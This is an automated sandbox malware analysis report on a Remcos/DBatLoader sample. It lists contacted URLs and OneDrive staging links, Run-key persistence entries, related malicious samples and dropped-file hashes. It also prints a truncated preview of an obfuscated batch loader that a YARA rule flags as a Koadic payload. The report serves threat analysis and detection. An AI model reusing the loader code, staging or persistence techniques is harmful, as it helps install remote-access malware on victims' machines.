  Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
• http://geoplugin.net/json.gp
  Source: nmfsxfjX.pif
  Malicious: true | Antivirus detection: URL Reputation: phishing; URL Reputation: phishing | Reputation: unknown
• https://xirfeg.sn.files.1drv.com/y4mA7VtsLBctMjPvNeW-nBjYzK-kMyIJaIZdFZhf0ai66qWNCa5Jqdc_iM5uVKa3zxn
  Source: Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.0000000000764000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
• https://xirfeg.sn.files.1drv.com/y4mmJkpN2-URpDPce1turH6bNoPZHs8qohGTBPPgUSqUu1WeGjpTknCmr6n8UWtLOer
  Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000071C000.00000004.00000020.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000072A000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
• https://onedrive.live.com/S
  Source: Xjfxsfmn.PIF, 0000000F.00000003.2559378885.00000000006F6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
• https://xirfeg.sn.files.1drv.com:443/y4mA7VtsLBctMjPvNeW-nBjYzK-kMyIJaIZdFZhf0ai66qWNCa5Jqdc_iM5uVKa
  Source: Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
• https://sectigo.com/CPS0
  Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
• http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
  Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
• http://ocsp.sectigo.com0
  Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
• http://geoplugin.net/json.gp/C
  Source: udVh4Ist4Z.exe, 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp
  Malicious: true | Antivirus detection: URL Reputation: phishing | Reputation: unknown
• https://xirfeg.sn.files.1drv.com/y4mQLd7Jb4tXEApwTb1qUvLYu4AYaX9rqayqbrqvAn-5-ThXvkZfJF26xlkeR3Ny-gJ
  Source: Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
• https://live.com/
  Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000072A000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
• http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
  Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
• https://xirfeg.sn.files.1drv.com/y4mf57oWea_lC5UFEW7heHii22ItiVRqzOkuZoz6yyafu_P62cjXQyR0S8WE0jPq8Gh
  Source: Xjfxsfmn.PIF, 0000000F.00000002.2560602263.0000000000772000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
• https://xirfeg.sn.files.1drv.com/
  Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000072A000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
• https://xirfeg.sn.files.1drv.com:443/y4mmJkpN2-URpDPce1turH6bNoPZHs8qohGTBPPgUSqUu1WeGjpTknCmr6n8UWt
  Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000071C000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
• http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
  Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
• http://www.pmail.com
  Source: remcos.exe, remcos.exe, 0000000C.00000000.2337823304.0000000000416000.00000002.00000001.01000000.00000007.sdmp, remcos.exe, 0000000C.00000002.2338890937.0000000000416000.00000002.00000001.01000000.00000007.sdmp, remcos.exe, 0000000D.00000000.2418876564.0000000000416000.00000002.00000001.01000000.00000007.sdmp, remcos.exe, 0000000D.00000002.2442004580.0000000000416000.00000002.00000001.01000000.00000007.sdmp, nmfsxfjX.pif, 00000010.00000000.2558844631.0000000000416000.00000002.00000001.01000000.00000006.sdmp, remcos.exe, 00000011.00000002.2566375553.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe, 00000011.00000000.2565214757.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe, 00000012.00000002.2620397438.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe, 00000012.00000000.2619943576.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe.10.dr, remcos.exe.6.dr, nmfsxfjX.pif.0.dr
  Malicious: false | Reputation: high
• http://ocsp.sectigo.com0C
  Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown
• https://onedrive.live.com/download?resid=9ADCDEDB531E38FE%21107&authkey=
  Source: Xjfxsfmn.PIF, 0000000F.00000002.2569407559.00000000141B2000.00000004.00001000.00020000.00000000.sdmp
  Malicious: false | Reputation: high
• https://xirfeg.sn.files.1drv.com:443/y4mQLd7Jb4tXEApwTb1qUvLYu4AYaX9rqayqbrqvAn-5-ThXvkZfJF26xlkeR3N
  Source: Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
• https://onedrive.live.com/
  Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.0000000000702000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.00000000008D0000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | Reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
• 13.107.137.11 | dual-spov-0006.spov-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430910
Start date and time: 2024-04-24 10:58:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: udVh4Ist4Z.exe (renamed because the original name is a hash value)
Original Sample Name: 2cc30d206669699e58870623365fef82.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@24/14@4/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 68
• Number of non-executed functions: 261
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.12
• Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, client.wns.windows.com, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-sn-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-sn-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
• 10:58:56 | API Interceptor | 2x Sleep call for process: udVh4Ist4Z.exe modified
• 10:59:03 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Xjfxsfmn C:\Users\Public\Xjfxsfmn.url
• 10:59:13 | API Interceptor | 2x Sleep call for process: Xjfxsfmn.PIF modified
• 10:59:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1 "C:\ProgramData\Remcos\remcos.exe"
• 10:59:21 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1 "C:\ProgramData\Remcos\remcos.exe"
• 10:59:29 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Xjfxsfmn C:\Users\Public\Xjfxsfmn.url
• 10:59:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1 "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
Match: 13.107.137.11 (Associated Sample Name / URL | Detection | Threat Name | Context)
• Payment Remittance Advice_000000202213.xlsb | malicious | Unknown | onedrive.live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU
Match: dual-spov-0006.spov-msedge.net (Associated Sample Name / URL | Detection | Threat Name | Context)
• URGENTE_NOTIFICATION.cmd | malicious | Remcos, DBatLoader | 13.107.139.11
• OKhCyJ619J.rtf | malicious | Remcos, DBatLoader | 13.107.137.11
• fu56fbrtn8.exe | malicious | Remcos, DBatLoader | 13.107.139.11
• FT. 40FE CNY .xlsx.lnk | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 13.107.139.11
• HFiHWvPsvA.rtf | malicious | Remcos, DBatLoader | 13.107.137.11
• payment swift.xls | malicious | Remcos, DBatLoader | 13.107.137.11
• VdwJB2cS5l.exe | malicious | Remcos, DBatLoader | 13.107.139.11
• pSfqOmM1DG.exe | malicious | Remcos, DBatLoader | 13.107.137.11
• https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22) | malicious | HtmlDropper, HTMLPhisher | 13.107.139.11
• UGS - CRO REQ - KHIDUBAI (OPL-841724).scr | malicious | PureLog Stealer, zgRAT | 13.107.137.11
Match: MICROSOFT-CORP-MSN-AS-BLOCKUS (Associated Sample Name / URL | Detection | Threat Name | Context)
• samradapps_datepicker_221114.xlam | malicious | Unknown | 13.107.246.69
• IPrstVM17M.exe | malicious | Unknown | 52.173.151.229
• https://220420241.blob.core.windows.net/web/index.html?id=999 | malicious | Unknown | 20.150.111.100
• URGENTE_NOTIFICATION.cmd | malicious | Remcos, DBatLoader | 13.107.139.11
• https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D | malicious | HTMLPhisher | 13.107.213.69
• OKhCyJ619J.rtf | malicious | Remcos, DBatLoader | 13.107.137.11
• #U5c97#U4f4d#U8865#U52a9#U5236#U5ea6.docx.doc | malicious | Unknown | 52.184.66.142
• fu56fbrtn8.exe | malicious | Remcos, DBatLoader | 13.107.139.11
• Payment MT103.xls | malicious | Unknown | 13.107.246.69
• Ref_Order04.xls | malicious | Unknown | 13.107.213.69
Match: a0e9f5d64349fb13191bc781f81f42e1 (Associated Sample Name / URL | Detection | Threat Name | Context)
• samradapps_datepicker_221114.xlam | malicious | Unknown | 13.107.137.11
• Enquiry 230424.bat | malicious | Remcos, DBatLoader | 13.107.137.11
• URGENTE_NOTIFICATION.cmd | malicious | Remcos, DBatLoader | 13.107.137.11
• fu56fbrtn8.exe | malicious | Remcos, DBatLoader | 13.107.137.11
• Payment MT103.xls | malicious | Unknown | 13.107.137.11
• Ref_Order04.xls | malicious | Unknown | 13.107.137.11
• FT. 40FE CNY .xlsx.lnk | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 13.107.137.11
• OHkRFujs2m.exe | malicious | Unknown | 13.107.137.11
• file.exe | malicious | RisePro Stealer | 13.107.137.11
• z56NF-Faturada-23042024.msi | malicious | MicroClip | 13.107.137.11
Associated samples (Match / Associated Sample Name or URL / Detection / Threat Name)
Match: C:\ProgramData\Remcos\remcos.exe
• Associated sample: FT. 40FE CNY .xlsx.lnk, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, RedLine
• Associated sample: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, RedLine
• Associated sample: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, RedLine
• Associated sample: 20240416-703661.cmd, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, RedLine
• Associated sample: disktop.pif.exe, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, RedLine
• Associated sample: 82__GT7568.PDF.exe, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, RedLine
• Associated sample: SecuriteInfo.com.Win32.Evo-gen.25660.20544.exe, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated sample: SecuriteInfo.com.Win32.Evo-gen.15258.6765.exe, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated sample: rKjlbIeOH9.exe, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, RedLine
• Associated sample: CONFIRMATION ORDER1.bat, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, RedLine
Match: C:\Users\Public\Libraries\easinvoker.exe
• Associated sample: Enquiry 230424.bat, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated sample: URGENTE_NOTIFICATION.cmd, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated sample: OKhCyJ619J.rtf, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated sample: fu56fbrtn8.exe, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated sample: FT. 40FE CNY .xlsx.lnk, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, RedLine
• Associated sample: HFiHWvPsvA.rtf, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated sample: payment swift.xls, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated sample: VdwJB2cS5l.exe, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated sample: SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated sample: Purchase order.exe, Detection: malicious, Threat Name: Remcos, DBatLoader
                                                                                      Process:C:\ProgramData\Remcos\remcos.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):42
                                                                                      Entropy (8bit):4.51089956542986
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:+Vu9R2cpf2gwn:+VaRdNpw
                                                                                      MD5:1E4CBA71ADCC3C10D024A3241C684067
                                                                                      SHA1:C8FAC6308279D1E93160FDD751214FE72A2876E9
                                                                                      SHA-256:1B8AB853C5977B486BBD2797D8E03C1D5AC25C7C295497A30883CCE98D6BC98C
                                                                                      SHA-512:6025751C63B451BBCAE1FD36626274BC7F7416354B2E09AE9273BD4BF13F76B50EE56FEDD559468B1131A6A1E29F00750253FE03D7E8C5A78463DBE8DA545264
                                                                                      Malicious:false
                                                                                      Preview:24-04-24.1059: Mercury/32 Loader Started..
                                                                                      Process:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):68096
                                                                                      Entropy (8bit):6.328046551801531
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                      MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                      SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                      SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                      SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                      Malicious:true
                                                                                       Antivirus:
                                                                                       • Antivirus: ReversingLabs, Detection: 3%
                                                                                       • Antivirus: Virustotal, Detection: 0%
                                                                                       Joe Sandbox View:
                                                                                       • Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious
                                                                                       • Filename: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious
                                                                                       • Filename: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious
                                                                                       • Filename: 20240416-703661.cmd, Detection: malicious
                                                                                       • Filename: disktop.pif.exe, Detection: malicious
                                                                                       • Filename: 82__GT7568.PDF.exe, Detection: malicious
                                                                                       • Filename: SecuriteInfo.com.Win32.Evo-gen.25660.20544.exe, Detection: malicious
                                                                                       • Filename: SecuriteInfo.com.Win32.Evo-gen.15258.6765.exe, Detection: malicious
                                                                                       • Filename: rKjlbIeOH9.exe, Detection: malicious
                                                                                       • Filename: CONFIRMATION ORDER1.bat, Detection: malicious
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5
                                                                                      Entropy (8bit):1.9219280948873623
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:MVy:Ms
                                                                                      MD5:B8A4F2F99C387B80CDA72F6B43079B8B
                                                                                      SHA1:A2281BBFE78D4F0D6FC03B4799FFD5D010997B13
                                                                                      SHA-256:90B53DF56816C127246136D4403ABA3B26CEC599B2B950FB2BA78D6C1FB4E6BF
                                                                                      SHA-512:413F0252867E18DD1F009F10018578790F9BFBE252B27FCC6452CB8B03E46CCAA251A9FF15CD962A45EA03469BBC7B1867A38A6F37EABEDAC29184AF5860501A
                                                                                      Malicious:false
                                                                                      Preview:100..
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1639424
                                                                                      Entropy (8bit):7.422853453364174
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/BhM6wIJp4m+3bu8U2flxAv:QkTpT9K1mzyhM6wW4mEQ2W
                                                                                      MD5:2CC30D206669699E58870623365FEF82
                                                                                      SHA1:DE5E70F094D0B72660AA57B87667EDD9D52971FC
                                                                                      SHA-256:42AC8E7E9DF9877AF1382F5626FD74E63210D307F6D577CD5B387FFD0C9520BD
                                                                                      SHA-512:2F1F275B9A928844D8F97DC07AA4D0F53DA61FD06A507424A873BA128E71D2754E710DBEBE1935ADC3DADA94B42417B1FC30A1915A40B2CFFC655C55D7C62005
                                                                                      Malicious:true
                                                                                       Antivirus:
                                                                                       • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                       • Antivirus: ReversingLabs, Detection: 63%
                                                                                       • Antivirus: Virustotal, Detection: 66%
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):30026
                                                                                      Entropy (8bit):3.9380000056299878
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:IBOY7cKQ/CyntVZjpubO0bXWQtagxP2+3o5WIGbfJTAy:C
                                                                                      MD5:828FFBF60677999579DAFE4BF3919C63
                                                                                      SHA1:A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC
                                                                                      SHA-256:ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
                                                                                      SHA-512:BF00909E24C5A6FB2346E8457A9ADACD5F1B35988D90ABBDE9FF26896BBB59EDAFEA60D9DB4D10182A7B5E129BB69585D3E20BC5C63AF3517B3A7EF1E45FFB7E
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\Public\Libraries\XjfxsfmnO.bat, Author: ditekSHen
                                                                                      Preview:..&@cls&@set "_...=H zAnOeUIivpoS3l71mXMxw8yaqYTEuKgFGPJZRfr@k6Wj9sbQB4VtLD2d0C5Nch"..%_...:~41,1%%_...:~47,1%%_...:~6,1%%_...:~53,1%%_...:~1,1%"_...=%_...:~10,1%%_...:~39,1%%_...:~16,1%%_...:~13,1%%_...:~25,1%%_...:~53,1%%_...:~42,1%%_...:~22,1%%_...:~18,1%%_...:~48,1%%_...:~51,1%%_...:~2,1%%_...:~61,1%%_...:~9,1%%_...:~19,1%%_...:~44,1%%_...:~50,1%%_...:~57,1%%_...:~26,1%%_...:~4,1%%_...:~62,1%%_...:~3,1%%_...:~33,1%%_...:~38,1%%_...:~40,1%%.......%%_...:~60,1%%_...:~0,1%%_...:~43,1%%_...:~34,1%%_...:~58,1%%_...:~15,1%%_...:~7,1%%_...:~20,1%%_...:~49,1%%_...:~35,1%%_...:~14,1%%_...:~30,1%%_...:~36,1%%_...:~41,1%%_...:~45,1%%_...:~11,1%%_...:~55,1%%_...:~32,1%%_...:~17,1%%_...:~63,1%%_...:~56,1%%_...:~21,1%%_...:~37,1%%_...:~8,1%%_...:~54,1%%_...:~28,1%%_...:~6,1%%.......%%_...:~5,1%%_...:~59,1%%_...:~52,1%%_...:~29,1%%_...:~24,1%%_...:~12,1%%_...:~46,1%%_...:~47,1%%_...:~1,1%%_...:~23,1%%_...:~27,1%%_...:~31,1%"..%_...:~38,1%%_...:~59,1%%_...:~51,1%%_...:~5,1%%_...:~60,1%"_....=%_...
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3646
                                                                                      Entropy (8bit):5.383959173452972
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:Zx2A0d5a9zHPwo0uP6SXjr4XtgPmon38JV7ZVhvoXS966hYxcdF4AlM5NQYE2Pl+:3L6jThc/pkmZAXpA2
                                                                                      MD5:71E46EFE9932B83B397B44052513FB49
                                                                                      SHA1:741AF3B8C31095A0CC2C39C41E62279684913205
                                                                                      SHA-256:11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
                                                                                      SHA-512:76DA3B441C0EAAAABDD4D21B0A3D4AA7FD49D73A5F0DAB2CFB39F2E114EFE4F4DABE2D46B01B66D810D6E0EFA97676599ECE5C213C1A69A5F2F4897A9B4AC8DA
                                                                                      Malicious:false
